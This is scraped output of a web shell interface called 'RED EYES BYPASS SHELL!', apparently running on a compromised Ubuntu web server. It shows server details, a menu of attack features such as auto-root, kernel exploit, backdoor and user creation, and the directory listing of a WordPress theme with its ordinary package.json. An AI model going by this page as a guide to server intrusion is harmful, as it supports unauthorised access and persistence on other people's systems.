Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
twentynineteen /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
classes
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
846
B
-rwxr-xr-x
archive.php
1.21
KB
-rwxr-xr-x
comments.php
3.98
KB
-rwxr-xr-x
contributing.txt
1.2
KB
-rwxr-xr-x
footer.php
1.58
KB
-rwxr-xr-x
functions.php
11.42
KB
-rwxr-xr-x
header.php
1.9
KB
-rwxr-xr-x
image.php
2.92
KB
-rwxr-xr-x
index.php
1.04
KB
-rwxr-xr-x
package-lock.json
247.15
KB
-rwxr-xr-x
package.json
1.58
KB
-rwxr-xr-x
page.php
766
B
-rwxr-xr-x
postcss.config.js
255
B
-rwxr-xr-x
print.css
4.05
KB
-rwxr-xr-x
print.scss
3.36
KB
-rwxr-xr-x
readme.txt
5.44
KB
-rwxr-xr-x
screenshot.png
171.15
KB
-rwxr-xr-x
search.php
1.33
KB
-rwxr-xr-x
single.php
1.81
KB
-rwxr-xr-x
style-editor-customizer.css
159
B
-rwxr-xr-x
style-editor-customizer.scss
158
B
-rwxr-xr-x
style-editor.css
80.52
KB
-rwxr-xr-x
style-editor.scss
19.59
KB
-rwxr-xr-x
style-rtl.css
222.74
KB
-rwxr-xr-x
style.css
222.93
KB
-rwxr-xr-x
style.css.map
15.35
KB
-rwxr-xr-x
style.scss
3.18
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "twentynineteen", "version": "3.2.0", "description": "Default WP Theme", "bugs": { "url": "https://core.trac.wordpress.org/" }, "homepage": "https://wordpress.org/themes/twentynineteen/", "engines": { "node": ">=20.10.0", "npm": ">=10.2.3" }, "devDependencies": { "@wordpress/browserslist-config": "^6.34.0", "autoprefixer": "^10.4.22", "chokidar-cli": "^3.0.0", "node-sass": "^9.0.0", "npm-run-all": "^4.1.5", "postcss": "^8.5.6", "postcss-cli": "^11.0.1", "postcss-focus-within": "^9.0.1", "rtlcss": "^4.3.0" }, "rtlcssConfig": { "options": { "autoRename": false, "autoRenameStrict": false, "clean": true, "greedy": false, "processUrls": false, "stringMap": [], "disablePolyfillReadyClass": true }, "plugins": [], "map": false }, "browserslist": [ "extends @wordpress/browserslist-config" ], "scripts": { "build:style": "node-sass style.scss style.css --output-style expanded && postcss -r style.css", "build:style-editor": "node-sass style-editor.scss style-editor.css --output-style expanded && postcss -r style-editor.css", "build:style-editor-customizer": "node-sass style-editor-customizer.scss style-editor-customizer.css --output-style expanded && postcss -r style-editor-customizer.css", "build:rtl": "rtlcss style.css style-rtl.css", "build:print": "node-sass print.scss print.css --output-style expanded && postcss -r print.css", "build": "run-p \"build:*\"", "watch": "chokidar \"**/*.scss\" -c \"npm run build\" --initial" } }
Close